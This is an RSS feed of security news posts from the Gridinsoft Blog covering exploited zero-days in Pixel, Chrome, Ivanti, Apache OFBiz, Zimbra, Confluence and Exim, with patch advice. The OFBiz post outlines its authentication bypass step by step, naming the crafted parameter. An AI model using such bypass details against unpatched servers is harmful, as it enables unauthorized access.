0-Day Archives – Gridinsoft Blog Welcome to the Gridinsoft Blog, where we share posts about security solutions to keep you, your family and business safe. Fri, 31 May 2024 01:07:38 +0000 en-US hourly 1 https://wordpress.org/?v=93139 200474804 Two Android Zero-Day Flaws in Google Pixel Exploited https://gridinsoft.com/blogs/android-zero-day-flaws-google-pixel/ https://gridinsoft.com/blogs/android-zero-day-flaws-google-pixel/#respond Fri, 05 Apr 2024 16:04:37 +0000 https://gridinsoft.com/blogs/?p=21089 Google has disclosed that two Android zero-day security vulnerabilities have been detected in its Pixel smartphones. The patch is already available, as Google claimed fixing the flaws in the recent Pixel Update Bulletin. Even worse news is that the flaw is already under exploitation in targeted attacks. Two Android Zero-Day Flaws Exploited in Targeted Attacks… Continue reading Two Android Zero-Day Flaws in Google Pixel Exploited

The post Two Android Zero-Day Flaws in Google Pixel Exploited appeared first on Gridinsoft Blog.

]]>
Google has disclosed that two Android zero-day security vulnerabilities have been detected in its Pixel smartphones. The patch is already available, as Google claimed fixing the flaws in the recent Pixel Update Bulletin. Even worse news is that the flaw is already under exploitation in targeted attacks.

Two Android Zero-Day Flaws Exploited in Targeted Attacks

In a recent announcement, Google released a statement regarding detecting two zero-day security vulnerabilities in its Pixel smartphones. The first vulnerability, CVE-2024-29745 (CVSS 7.2), is an information disclosure flaw in the bootloader component that could compromise data confidentiality. The other one, CVE-2024-29748, is a privilege escalation flaw in the firmware component that can allow unauthorized access and control over the device.

GrapheneOS Android Zero-day tips
Detailed explanation of new zero-days from GrapheneOS developers

According to Google’s advisory, these vulnerabilities were fixed on April 2, 2024. The original discovery though happened back in early January 2024, by GrapheneOS developers. The good news is that they are subject to limited, targeted exploitation, which means the risk of widespread exploitation is relatively low. Nonetheless, Google urges all Pixel smartphone users to update their devices to the latest software version as soon as possible.

Android Zero-Day Vulnerabilities Exploited in the Wild

Although Google has not provided specifics on the attacks, GrapheneOS developers have indicated active exploitation of this flaw. In addition, CISA has updated its Known Exploited Vulnerabilities Catalog with these vulnerabilities currently being exploited. CVE-2024-29745 is linked to a vulnerability in the fastboot firmware, which supports various device states such as unlocking, flashing, and locking. Threat actors can exploit this flaw to access the devices’ memory without privileges or user interaction.

On the other hand, CVE-2024-29748 presents a different risk. This flaw allows to circumvent the factory reset done by the apps that use device admin API for this. As the result, attackers were able to stop the device from finishing the factory reset, although they need a physical interaction with one. Although Google has addressed a part of the issue, GrapheneOS has pointed out that the reset can still be stopped by cutting power to the device. As a result, GrapheneOS is working on a more comprehensive solution. This includes a stronger duress PIN/password feature and a secure “panic wipe” action that can be executed without requiring a reboot.

Safety Recommendations

As the digital landscape evolves, so does the sophistication of cyber threats. To mitigate these risks, users should manually verify if their devices have the latest software version. Staying informed about security updates and best practices is crucial in safeguarding digital assets against emerging threats. Google’s disclosure serves as a reminder of the ongoing battle for cybersecurity and the need for continuous improvement in defense mechanisms to protect personal information.

Two Android Zero-Day Flaws in Google Pixel Exploited

The post Two Android Zero-Day Flaws in Google Pixel Exploited appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/android-zero-day-flaws-google-pixel/feed/ 0 21089
New Google Chrome 0-day Vulnerability Exploited, Update Now https://gridinsoft.com/blogs/new-google-chrome-0-day-vulnerability/ https://gridinsoft.com/blogs/new-google-chrome-0-day-vulnerability/#respond Tue, 16 Jan 2024 20:34:57 +0000 https://gridinsoft.com/blogs/?p=19078 In the most recent release notes, Google reports about a new 0-day vulnerability that is already exploited in the wild. The update fixes the issue, but the very fact of it being exploited means it should be implemented as soon as possible. It appears to be the first 0-day exploit in Chrome browser in 2024.… Continue reading New Google Chrome 0-day Vulnerability Exploited, Update Now

The post New Google Chrome 0-day Vulnerability Exploited, Update Now appeared first on Gridinsoft Blog.

]]>
In the most recent release notes, Google reports about a new 0-day vulnerability that is already exploited in the wild. The update fixes the issue, but the very fact of it being exploited means it should be implemented as soon as possible. It appears to be the first 0-day exploit in Chrome browser in 2024.

New Chrome 0-day Vulnerability Fixed

On January 16, Google released an update for its Chrome browser that contains a fix for 3 vulnerabilities. Among them there is one, CVE-2024-0519, that was reported by an anonymous user. The company acknowledges the exploitation of this breach in the wild.

0-day vulnerability exploited
An excerpt from Google’s patch note for the latest Chrome update

Key issue of the vulnerability lies in an improper memory access control in the JScript V8 engine, used in Chrome. The issue falls under CWE-119 designation. The way Chrome operates supposes the ability of direct memory addressing, but with lack of proper handling, it leads to the ability to reference to a wrong memory location. What this gives to attackers is the ability to both read and write to the random memory area, causing data leaks and arbitrary code execution.

Besides the most sensible issue, there are also 2 high-severity vulnerabilities fixed in the same update. Both touch V8 JavaScript, too, but are related to lack of memory write validation and type confusion. The latter, actually, can lead to similar effects with CVE-2024-0519, so it should be treated with the same seriousness. The good thing about these two is the absence of their real-world exploitation.

Google Releases Fix to the Newest 0-day Exploit

The severity of the issue obviously calls for urgent response from the developer. Fortunately, Google never hesitates to patch such bugs. However, due to the limitations, the patch may not be available to all users simultaneously. Here is the list of OS-specific versions that contain a fix.

OS Version with Fix
Windows 120.0.6099.224(225)
MacOS 120.0.6099.234
Linux 120.0.6099.224

To check whether you have an updated version of the browser or to check for updates, go to Settings → About Chrome. This will open the menu which checks the update availability each time you open it.

Chrome updated

Being the most popular web browser is not just about privileges, as you may witness. Such a humongous user base means increased (if not maxed out) attention from adversaries, who take such vulnerabilities nothing short of a gift. For ordinary users, the best way to counteract this is to keep an eye on the latest updates, specifically on what issues they fix.

The post New Google Chrome 0-day Vulnerability Exploited, Update Now appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/new-google-chrome-0-day-vulnerability/feed/ 0 19078
Ivanti Connect Secure Zero-Day Vulnerability Exploited In The Wild https://gridinsoft.com/blogs/ivanti-connect-secure-0day-exploited/ https://gridinsoft.com/blogs/ivanti-connect-secure-0day-exploited/#respond Fri, 12 Jan 2024 10:15:08 +0000 https://gridinsoft.com/blogs/?p=18979 Ivanti issued an alert about its Connect Secure VPN appliances. Advanced threat actors are exploiting two zero-day vulnerabilities in cyberattacks, possibly including state-sponsored groups. That is yet another vulnerability in Ivanti software. Ivanti Connect Secure Zero-Day Exploited Ivanti, a prominent software company, recently issued a critical alert concerning its Connect Secure VPN appliances. These devices… Continue reading Ivanti Connect Secure Zero-Day Vulnerability Exploited In The Wild

The post Ivanti Connect Secure Zero-Day Vulnerability Exploited In The Wild appeared first on Gridinsoft Blog.

]]>
Ivanti issued an alert about its Connect Secure VPN appliances. Advanced threat actors are exploiting two zero-day vulnerabilities in cyberattacks, possibly including state-sponsored groups. That is yet another vulnerability in Ivanti software.

Ivanti Connect Secure Zero-Day Exploited

Ivanti, a prominent software company, recently issued a critical alert concerning its Connect Secure VPN appliances. These devices are susceptible to zero-day vulnerabilities currently being exploited in sophisticated cyberattacks. Experts attribute these attacks to suspected Chinese state-backed hackers.

Ivanti has confirmed that the vulnerabilities in question allow attackers to gain unauthorized access and execute arbitrary code on affected devices. Considering the widespread use of Ivanti Connect Secure appliances in various business environments and providing secure remote access to corporate networks, it is of heightened concern.

Details of the ICS 0-Day Vulnerability

The exploited vulnerabilities are CVE-2023-46805 (CVSS 8.2) and CVE-2024-21887 (CVSS 9.1). The vulnerabilities can be fashioned into an exploit chain to take over susceptible instances over the Internet. These flaws may lead to severe consequences, including remote code execution (RCE) and unauthorized access to sensitive data. That, actually, explains the reason for 8+ score – the best things come in two.

The first vulnerability concerns authentication bypass in the web component, which allows remote attackers to access restricted resources without proper control checks. The second vulnerability is related to command injection in the web components, which allows authenticated administrators to execute arbitrary commands on the appliance by sending specially crafted requests.

Patches Not Yet Available

Although it has identified fewer than ten customers that have been affected, Ivanti has advised all of its customers to run the external Integrity Checker Tool (ICT) as a precautionary measure. The company has also added new functionality to the external ICT, which will be incorporated into the internal ICT. Customers should ensure they have both tools’ latest versions.

As for patch fixes, Ivanti plans to release patches for these vulnerabilities during the week of January 22. However, they will be rolled out in a staggered schedule according to the product version. In the meantime, the company has released a series of mitigation steps that customers should follow immediately to safeguard their systems. It is highly recommended that organizations follow these mitigation steps, as the situation is still evolving.

How to Protect against 0-day vulnerabilities?

Since a zero-day vulnerability is a vulnerability that attackers learned about before software developers did, there is no guaranteed solution. However, some measures significantly reduce the risks, and I will list them below:

  • Use corporate-grade protection solutions like EDR/XDR. This innovative anti-malware software approach focuses on endpoint protection rather than individual devices. EDR and XDR solutions collect a vast amount of data about endpoint activity, including file operations, network traffic, and user behavior. It employs machine learning and AI to detect and respond to threats. By analyzing this data, they can identify anomalous patterns indicating a zero-day attack.
  • Apply Zero Trust. Zero trust is a cybersecurity model that grants access on a least privilege basis and continuously verifies users and devices. As a result, this reduces the attack surface and makes it more difficult to exploit vulnerabilities.
  • Perform regular pentesting. Penetration testing is a simulated real attack on an organization’s IT infrastructure to identify and assess vulnerabilities that attackers could exploit. So, this action can help organizations identify zero-day vulnerabilities that other security tools may not detect.

The post Ivanti Connect Secure Zero-Day Vulnerability Exploited In The Wild appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/ivanti-connect-secure-0day-exploited/feed/ 0 18979
Apache OFBiz Vulnerability Exposes Millions of Systems https://gridinsoft.com/blogs/apache-ofbiz-vulnerability/ https://gridinsoft.com/blogs/apache-ofbiz-vulnerability/#respond Tue, 09 Jan 2024 22:09:50 +0000 https://gridinsoft.com/blogs/?p=18913 The cyber world has been rattled by the recent discovery of a critical zero-day vulnerability in Apache OFBiz, known as CVE-2023-51467. Researchers at SonicWall unveiled this flaw, which poses a significant threat by enabling attackers to bypass authentication and carry out a Server-Side Request Forgery (SSRF). The vulnerability is severe, with a CVSS score of… Continue reading Apache OFBiz Vulnerability Exposes Millions of Systems

The post Apache OFBiz Vulnerability Exposes Millions of Systems appeared first on Gridinsoft Blog.

]]>
The cyber world has been rattled by the recent discovery of a critical zero-day vulnerability in Apache OFBiz, known as CVE-2023-51467. Researchers at SonicWall unveiled this flaw, which poses a significant threat by enabling attackers to bypass authentication and carry out a Server-Side Request Forgery (SSRF). The vulnerability is severe, with a CVSS score of 9.8, and has sparked concerns across various industries relying on Apache OFBiz’s Java-based web framework​.

What is Apache OFBiz?

Apache OFBiz is an integral part of the digital backbone of numerous industries, ranging from financial services to healthcare. This open-source Enterprise Resource Planning (ERP) system is a key player in managing complex business processes, which is essential for large enterprises. This is what makes the CVE-2023-51467 vulnerability something more than a technical glitch. Its extensive exploitation can be a potential gateway for catastrophic disruptions in critical services and infrastructure​​.

Apache OFBiz Vulnerability – Technical side

SonicWall’s research team detected this critical zero-day vulnerability and promptly disclosed it to Apache OFBiz’s maintainers. The root of this vulnerability lies in the application’s login functionality. Attackers exploiting CVE-2023-51467 can bypass authentication by manipulating the checkLogin function in Apache OFBiz. By setting the “requirePasswordChange” parameter to “Y” in the URI and supplying null or invalid credentials, the function mistakenly returns a success status, thus allowing unauthorized access​​​​. The vulnerability specifically affects the login process of Apache OFBiz.

Authentication Bypass Vulnerability
Code parts in the login function in the LoginWorker.java.

How does the exploit work?

  1. Manipulating the CheckLogin Function
    The core issue lies in the “checkLogin” function. Normally, this function should validate a user’s credentials before granting access. However, due to a flaw in its implementation, it fails to perform this task correctly under certain conditions.
  2. Exploiting Null or Invalid Credentials
    The exploit involves sending a crafted HTTP request where the “USERNAME” and “PASSWORD” parameters are left empty, or invalid values are provided. However, the exploit includes the “requirePasswordChange=Y” parameter in the URI.
  3. Bypassing Authentication Checks
    Due to the flawed logic in the “checkLogin” function, when it receives null or invalid credentials along with the “requirePasswordChange=Y” parameter, it incorrectly bypasses the usual authentication checks. Specifically, it fails to enter the conditional block that checks whether the username and password are null. Consequently, it erroneously returns a success status, allowing the authentication process to be bypassed.
  4. Potential for Server-Side Request Forgery (SSRF) or Remote Code Execution (RCE)
    By bypassing authentication, an attacker could potentially perform SSRF or RCE, leading to unauthorized access to sensitive data or control over the system.
Bypassing Authentication Checks
Sending an HTTP request, prompting the server to respond with a “PONG” message.

The exploitation of this flaw could lead to dire consequences. Attackers could potentially gain control over sensitive systems, compromise confidential data, and disrupt essential services. Also, he widespread use of Apache OFBiz in various sectors heightens the risk of large-scale, coordinated attacks that could target multiple facets of society simultaneously​​.

Patch and Recommendations

In response to this alarming discovery, Apache released a security update. The new version, 18.12.11, addresses the vulnerability and is strongly recommended for immediate implementation. Additionally, organizations are advised to conduct thorough security audits and apply patches to all affected platforms promptly​​.

Users of Apache OFBiz are strongly advised to:

  • Upgrade to Apache OFBiz version 18.12.11, which contains the fix for this vulnerability.
  • Regularly audit systems for vulnerabilities and apply necessary patches.
  • Keep an eye on system logs and access patterns to detect any signs of exploitation attempts.
  • Utilize XDR solutions proactively to prevent cyberattacks by continuously monitoring and correlating data across endpoints, networks, and cloud environments. Early threat detection and rapid response are key.

Apache OFBiz Vulnerability Exposes Millions of Systems

The post Apache OFBiz Vulnerability Exposes Millions of Systems appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/apache-ofbiz-vulnerability/feed/ 0 18913
Zimbra Vulnerability Exploited in the Wild https://gridinsoft.com/blogs/zimbra-0-day-vulnerability/ https://gridinsoft.com/blogs/zimbra-0-day-vulnerability/#respond Mon, 20 Nov 2023 13:03:39 +0000 https://gridinsoft.com/blogs/?p=17782 Google TAG’s recent discovery reveals a 0-day exploit, CVE-2023-37580, targeting Zimbra Collaboration. This is a Cross-Site Scripting (XSS) vulnerability exploited in four campaigns. Zero-day discovery was patched A severe vulnerability has been discovered in the Zimbra email software. Four hacker groups exploited vulnerabilities to steal email data, user credentials, and tokens. According to the Google… Continue reading Zimbra Vulnerability Exploited in the Wild

The post Zimbra Vulnerability Exploited in the Wild appeared first on Gridinsoft Blog.

]]>
Google TAG’s recent discovery reveals a 0-day exploit, CVE-2023-37580, targeting Zimbra Collaboration. This is a Cross-Site Scripting (XSS) vulnerability exploited in four campaigns.

Zero-day discovery was patched

A severe vulnerability has been discovered in the Zimbra email software. Four hacker groups exploited vulnerabilities to steal email data, user credentials, and tokens. According to the Google TAG research, most attacks were reported after the company published an initial patch on GitHub.

The vulnerability, CVE-2023-37580, with a CVSS score of 6.1, is a cross-site scripting (XSS) vulnerability present in versions before 8.8.15 Patch 41. The company has addressed the issue as part of the updates released on July 25, 2023. The flaw can be exploited to execute malicious scripts in a victim’s web browser via an XSS request after simply clicking a URL link. The worst part is that you don’t need to download or install anything for the attack to succeed.

Exploitation Overview

In June 2023, researchers reported multiple waves of cyber attacks. The attacks began on June 29, at least two weeks before Zimbra released the official notice. Three of the four malicious campaigns were discovered before the patch was issued. At the same time, the fourth was detected a month after the patch was published.

Zimbra vulnerability exploitation screenshot
Zimbra vulnerability exploitation (Image by Google TAG)

Greece Targeted for Email Theft. The initial exploitation targeted a government organization in Greece, employing emails with exploited URLs. Clicking the link during a Zimbra session led to the deployment of a framework documented by Volexity in February 2022. This framework utilized XSS to pilfer mail data, including emails and attachments, and set up auto-forwarding to an attacker-controlled email address.

Winter Vivern Exploits after Hotfix. Following the hotfix on July 5, an actor exploited the vulnerability for two weeks starting July 11. Multiple exploit URLs targeted government organizations in Moldova and Tunisia, attributed to the APT group Winter Vivern (UNC4907). The vulnerability facilitated the loading of malicious scripts.

Phishing Campaign in Vietnam. Days before Zimbra’s official patch, an unidentified group exploited the vulnerability in a campaign phishing for credentials in a Vietnamese government organization. The exploit URL is directed to a script displaying a phishing page for webmail credentials.

Authentication Token Theft in Pakistan. After the CVE-2023-37580 patch release, a fourth campaign targeted a government organization in Pakistan, focusing on stealing Zimbra authentication tokens, exfiltrated to ntcpk[.]org.

Safety Recommendations

As we can see, attackers often closely watch open-source repositories. Thus, they continuously look for vulnerabilities that they can exploit. In some cases, the fix for a vulnerability may already be available in the repository but not released to users.

CVE-2023-37580 could allow an attacker to steal user data or take control of user accounts. Upgrade to Zimbra Collaboration (ZCS) 8.8.15 Patch 41 or later to avoid this vulnerability. If you cannot upgrade immediately, you can mitigate the risk of this vulnerability by disabling the Zimbra Classic Web Client and using the Zimbra Web App instead.

The post Zimbra Vulnerability Exploited in the Wild appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/zimbra-0-day-vulnerability/feed/ 0 17782
New Confluence Vulnerability Leads to Unauthorised Access https://gridinsoft.com/blogs/new-confluence-vulnerability-unauthorised-access/ https://gridinsoft.com/blogs/new-confluence-vulnerability-unauthorised-access/#respond Tue, 31 Oct 2023 15:32:49 +0000 https://gridinsoft.com/blogs/?p=17408 Another vulnerability in the flagship product of Atlassian corporation, Confluence, allows hackers to access the servers and dump the data. As the company claims, the issue sits in the improper authorization within the Data Center and Server apps. The company already offers the patches for this breach. Confluence Data Center and Server Vulnerability Leads to… Continue reading New Confluence Vulnerability Leads to Unauthorised Access

The post New Confluence Vulnerability Leads to Unauthorised Access appeared first on Gridinsoft Blog.

]]>
Another vulnerability in the flagship product of Atlassian corporation, Confluence, allows hackers to access the servers and dump the data. As the company claims, the issue sits in the improper authorization within the Data Center and Server apps. The company already offers the patches for this breach.

Confluence Data Center and Server Vulnerability Leads to Data Loss

As it often happens to any vulnerabilities within authorization/input validation, the new breach in Confluence got a rather high CVSS mark – 9.1/10. All versions of Confluence Data Center and Server are susceptible to this vulnerability. Though, good news for the clients – the breach was discovered by the developers and is not exploited in the wild. At least yet.

Atlassian publication CVE-2023-22518
Topic on the Atlassian website about the latest vulnerability

Currently, neither company nor researchers show any PoC exploits for this flaw. And within this short time gap, before the hackers will find the way to use the vulnerability, it will be a great idea to install the patches offered by the company. Despite the vulnerability touching all Data Center and Server versions ever released, the patches cover only the most used version.

Actually, CVE-2023-22518 is not the only recent security vulnerability in the Confluence. A few weeks ago, on October 5, the cybersecurity world was set abuzz due to a zero-day discovery in the same Data Center and Server solution. This exploit was reportedly used later on, by a Storm-0062 a.k.a DarkShadow cybercrime gang. The breach allowed hackers to access Confluence servers and create accounts with admin privileges without any permissions required. While for a smaller company or a more niche product this may be not so critical, it is pretty bad for a massively popular software that Atlassian develops.

CVE-2023-22515 exploitation stats
Statistics regarding the cases of CVE-2023-22515

Confluence Patches for CVE-2023-22518 are Available

The fact that the co was the first to describe the breach adds the silver lining to the story. Along with the report about the discovered issue, they immediately released security updates that are called to patch the exploit. And while the previous exploit was working only on Data Center and Server version 8+, the new one makes all the versions susceptible to exploitation.

As there are several major versions of the solution in use, the co have made patches for each of them:

Product name Versions
Confluence Data Center and Server
  • 7.19.16 or later
  • 8.3.4 or later
  • 8.4.4 or later
  • 8.5.3 or later
  • 8.6.1 or later

For mitigations, Atlassian only offers to shift the vulnerable instance of the product into offline mode. Yes, this effectively means stopping any operations related to the Confluence, though if there is no way to implement the latest updates, not many other options are available.

How to protect against software vulnerabilities?

Well, as you can see, pretty much any software solution can have vulnerabilities. Brands, developers and stuff the like does not influence: if there is something to hack, it will be hacked. There, only your fast reaction and the presence of proper security is what can secure your system.

EDR/XDR systems that use zero-trust policy are the best way to secure yourself from exploitation attacks. Their all-encompassing protection allows them to track, analyze and stop any suspicious activity. Meanwhile zero-trust will not leave a chance for exploitation even in a highly-trusted application. They treat any app as potentially dangerous, so even the Confluence will be checked as roughly as a Java-applet from the Web.

Keep an eye on recent cybersecurity news. Events like new vulnerabilities, or the companies hacked with their usage obviously cause massive discussions. Sure, not all of them will touch the software you use, but being on alarm is worth it.

Regularly update the software or apply mitigation patches. Most of the minor updates are needed not only to fix some minor bugs, but also to patch security vulnerabilities. A good habit here is viewing the patch notes – they can quickly reveal if the update is security-related or brings other stuff. For large companies, with dozens of computers in the network, it may be complicated to update the software in one turn, so making a choice is important.

New Confluence Vulnerability Leads to Unauthorised Access

The post New Confluence Vulnerability Leads to Unauthorised Access appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/new-confluence-vulnerability-unauthorised-access/feed/ 0 17408
Exim Vulnerability Allows RCE, No Patches Available https://gridinsoft.com/blogs/exim-vulnerability-rce/ https://gridinsoft.com/blogs/exim-vulnerability-rce/#respond Fri, 29 Sep 2023 20:54:06 +0000 https://gridinsoft.com/blogs/?p=17024 Exim Internet Mailer, a program massively used as a basis for mailing servers, appears to have a remote code execution vulnerability. By overflowing the buffer, hackers can make the program execute whatever code they need. Despite several reports to the developer, the patch is still not available. What is Exim? Exim is a mail transfer… Continue reading Exim Vulnerability Allows RCE, No Patches Available

The post Exim Vulnerability Allows RCE, No Patches Available appeared first on Gridinsoft Blog.

]]>
Exim Internet Mailer, a program massively used as a basis for mailing servers, appears to have a remote code execution vulnerability. By overflowing the buffer, hackers can make the program execute whatever code they need. Despite several reports to the developer, the patch is still not available.

What is Exim?

Exim is a mail transfer agent application for *NIX systems. Appeared back in 1995, it gained popularity as a free, open-source and flexible solution for mailing. Throughout the time, it was ported to different platforms, including even Windows. Some Linux distributions even included it as a default MTA solution. Despite its obsolescence, Exim keeps quite a share of ~59% among mailing clients available on the Internet.

Exim main site
Main site of Exim Internet Mailer

Exim Buffer Overflow Vulnerability Allows RCE

Such a popularity, along with long-missing updates, could not be missed by cybercriminals. A 0-day vulnerability, discovered by an anonymous reporter, sits in a lack of input validation from the user. Hackers can reach the mailing server from a default SMTP port 25, and write data past the end of a buffer. This, eventually, allows them to execute any command they wish – and at the scale of a mailing server, this may have horrific consequences.

It is common for RCE vulnerabilities to receive the highest CVSS ratings. CVE-2023-42115 received a rating of 9.8/10, which puts it inline with the infamous MOVEit and Citrix NetScaler vulnerabilities, uncovered earlier this year. The problem is known to the developers for almost half a year, and the patch is still unreleased.

How to protect against RCE Vulnerabilities?

There, I usually share information about available patches from the vendor or temporary solutions that can fix the flaw. Though not this time. Lack of response from the developer means any fixes for the vulnerability is only up to the Exim users. The only way to be secured against the breach is to avoid using the program, but that can be rather problematic with such a huge share of mailing servers running Exim.

With that being said, I will still advise to use top-notched security solutions that feature most modern cybersecurity approaches. This will effectively detect and mirror any cyberattack attempts before hackers will be able to reach even a shade of success.

Giving crooks less chances for success though is not only about having a reliable security system. Sentinels are useless when there is an open vent in the warehouse. Under open vent, I mean unpatched software with known vulnerabilities and low cybersecurity awareness among personnel. Cybercriminals know and love both of these common weak spots, and be sure – they won’t hesitate to use them when needed.

Exim Vulnerability Allows RCE, No Patches Available

The post Exim Vulnerability Allows RCE, No Patches Available appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/exim-vulnerability-rce/feed/ 0 17024
Can Zero-Day Attacks Be Prevented With Patches? https://gridinsoft.com/blogs/zero-day-patching-effective-or-not/ https://gridinsoft.com/blogs/zero-day-patching-effective-or-not/#respond Thu, 07 Sep 2023 15:05:31 +0000 https://gridinsoft.com/blogs/?p=16785 In recent years, zero-day exploits and attacks have become prominent emerging threats. These attacks take advantage of unknown vulnerabilities within software, which makes them almost impossible to detect and prevent. Zero-day attacks can have dire consequences, allowing attackers to take control of systems, steal data, or install malware. What is a Zero-Day attack? A zero-day… Continue reading Can Zero-Day Attacks Be Prevented With Patches?

The post Can Zero-Day Attacks Be Prevented With Patches? appeared first on Gridinsoft Blog.

]]>
In recent years, zero-day exploits and attacks have become prominent emerging threats. These attacks take advantage of unknown vulnerabilities within software, which makes them almost impossible to detect and prevent. Zero-day attacks can have dire consequences, allowing attackers to take control of systems, steal data, or install malware.

What is a Zero-Day attack?

A zero-day attack is a type of vulnerability that has not been detected yet. It can be used for malware deployment and can target any application as a potential attack surface. This makes it difficult to build a trusted lineup of any sort and poses a significant challenge for cybersecurity analysts. However, for those who work in this industry, the challenge is exciting.

Zero-day vulnerability
Zero-day vulnerability lifecycle

Attackers can exploit the undeclared function in a program or operating system to execute their code more beneficially. The most commonly used exploits by cybercriminals are those that provide remote code execution and escalation of privileges, which allow them to do whatever they want in the infected environment. As these attacks require advanced software, they are usually targeted against corporations since they possess more valuable data.

As the only person who knows about the breach is the criminal who discovered it, exploiting it without triggering any alarms or drawing attention is quite simple. Even some EDR solutions can make mistakes by overlooking actions from trusted programs without considering that such activities could be malicious. That’s why using an endpoint protection application that can prevent zero-day attacks is advisable.

Identifying and Addressing Zero-Day Exploits and Attacks

Detecting and mitigating zero-day exploits and attacks can be challenging since there are no known vulnerabilities or signatures to identify them. Nevertheless, there are strategies that can be utilized to identify and eliminate these attacks.

  • Monitor network traffic and system logs to identify any suspicious activity that could indicate a zero-day attack.
  • Educate users on common attack methods, such as phishing and social engineering, to reduce the likelihood of a successful zero-day attack.
  • Stay updated with software, system updates, and patches to minimize vulnerabilities that could be exploited in a zero-day attack.
  • Implement intrusion detection and prevention systems to help detect and block zero-day exploits and attacks before they can cause damage.

Patches May Be Ineffective, Here Is Why

Organizations have been struggling with patch management for a long time. One of the reasons is the overwhelming number of patches they need to handle. In 2021, over 20,000 vulnerabilities were fixed, making it increasingly challenging to keep up with all the updates.

Zero-Day vulnerability
Timeline of a zero-day vulnerability

Even if staying up-to-date with patches was easy, many users tend to ignore them, thinking they can afford to update their software a few days or weeks after the release. However, this practice can pose significant risks, which many users are unaware of. Furthermore, patch management is often given little attention in security awareness training, despite the Department of Homeland Security recommending that critical patches be applied within 15 days of release.

However, determining which patches are critical can be a dilemma for many security teams. These teams have procedures in place to ensure that patches are tested internally before deployment, as sometimes, they can be buggy or ineffective, causing more harm. IT teams also follow procedures to track patch deployments and to ensure that no device or system is left unpatched.

How to Protect Against Zero-Days?

It is crucial to understand that the threat landscape is always changing, and new versions of zero-day vulnerabilities emerge frequently. To keep yourself informed about the latest developments and types of zero-day vulnerabilities each year, it is recommended to follow reliable sources on cybersecurity and remain up-to-date with current events in this industry.

Moreover, in today’s cybersecurity landscape, Endpoint Detection and Response (EDR) and Extended Detection and Response (XDR) solutions are gaining significance. They work best when combined with the zero-trust model of protection.

Implementing updates promptly to improve cybersecurity and reduce risks by addressing known vulnerabilities is essential. By integrating EDR and XDR solutions that feature zero-trust architecture, organizations can detect, respond to, and mitigate security threats more efficiently, whether they involve known vulnerabilities or zero-day exploits. These technologies create a strong security posture prioritizing continuous monitoring, verification, and adaptive responses to evolving cyber threats. This helps to maintain a secure environment.

The post Can Zero-Day Attacks Be Prevented With Patches? appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/zero-day-patching-effective-or-not/feed/ 0 16785
Ivanti EPMM Vulnerability Patch is Vulnerable https://gridinsoft.com/blogs/ivanti-epmm-patch-fix-vulnerable/ https://gridinsoft.com/blogs/ivanti-epmm-patch-fix-vulnerable/#respond Thu, 03 Aug 2023 14:08:52 +0000 https://gridinsoft.com/blogs/?p=16532 Ivanti, the provider of a wide range of management solutions for corporations, have apparently taken up the baton from Ipswich, the vendor of an infamous MOVEit MFT. Analysts discovered 2 severe vulnerabilities in its EPMM over the last 10 days, and the company released urgent fixes. However, the patch for the CVE-2023-35078 appears to be… Continue reading Ivanti EPMM Vulnerability Patch is Vulnerable

The post Ivanti EPMM Vulnerability Patch is Vulnerable appeared first on Gridinsoft Blog.

]]>
Ivanti, the provider of a wide range of management solutions for corporations, have apparently taken up the baton from Ipswich, the vendor of an infamous MOVEit MFT. Analysts discovered 2 severe vulnerabilities in its EPMM over the last 10 days, and the company released urgent fixes. However, the patch for the CVE-2023-35078 appears to be vulnerable for exploitation through the same pattern.

Ivanti EPMM Vulnerabilities Keep Going

On July 25, 2023 Ivanti released a note regarding the vulnerability in their EPMM device management software. They offered to install a patch to secure the software vulnerability (dubbed CVE-2023-35078) that allowed hackers to bypass authentication and access all the functionality of the app. Obviously, it received a top 10/10 CVSS rating. Bad news here is that the vulnerability was reportedly exploited since April 2023. The patch offered by the company allegedly closes the unauthorised access capabilities.

CVE-2023-35078 exploitation heatmap
Heatmap of CVE-2023-35078 exploitation by countries

Soon after, another security loophole was discovered. CVE-2023-35081 is a path traversal vulnerability that allows for unauthorised access to the files stored on the server. Unfortunately, the scale of this breach exploitation is around the same as the previous one – hackers used them along to fulfil different targets within one attack.

Thing is, not everything is ideal for the patched 2023-35078 vulnerability. Researchers found a way to do pretty much the same trick to the patched version as hackers did earlier. The new breach is possible for older versions of the EPMM – 11.2 and below – and received an index of CVE-2023-35082. Even after the patch, applications were not able to provide a sustainable security level. Fortunately, no cases of exploitation of this vulnerability have been discovered yet. But as we know, once 0-day vulnerability becomes an n-day one, its usage becomes much more widespread.

How to protect against CVE-2023-35082?

The only – and the most effective advice there is updating Ivanti EPMM to any of the versions newer than 11.2. It may be troublesome to perform such an update simultaneously in a huge network of devices, though efforts there are much more preferable than efforts on fixing the outcome of a cyberattack. Though, there could be several other solutions – not preventive, but still effective.

Adopt cybersecurity solutions with zero-trust policy. The baddest modern cyberattacks are done through vulnerabilities in trusted software, the only solution is to not trust at all. EDR/XDR solutions that are built around such a conception have their downsides, apparently, but the effectiveness of their protection is undoubted. Either it is a hand-made utility or a program with over 1 million users – it will thoroughly check all the actions it does.

Use UBA and SIEM to improve visibility and response in the environment. The aforementioned zero-trust security systems will greatly appreciate additional sources of information. This is almost essential in large networks that consist of different types of devices. Being aware and being able to respond as quickly as possible is vital in modern cybersecurity, when the count can go on for minutes.

Ivanti EPMM Vulnerability Patch is Vulnerable

The post Ivanti EPMM Vulnerability Patch is Vulnerable appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/ivanti-epmm-patch-fix-vulnerable/feed/ 0 16532
Ivanti 0-day exploited to target Norwegian government https://gridinsoft.com/blogs/ivanti-zero-day-norwegian-government/ https://gridinsoft.com/blogs/ivanti-zero-day-norwegian-government/#respond Tue, 25 Jul 2023 18:10:21 +0000 https://gridinsoft.com/blogs/?p=16297 Software development company Ivanti (formerly MobileIron Core) has patched a zero-day vulnerability that allowed authentication bypass. This vulnerability had a maximum CVSS level and was actively exploited to gain unauthorized access. What is Ivanti Company? Ivanti is an IT software company headquartered in Utah, United States. It produces a variety of IT management and security… Continue reading Ivanti 0-day exploited to target Norwegian government

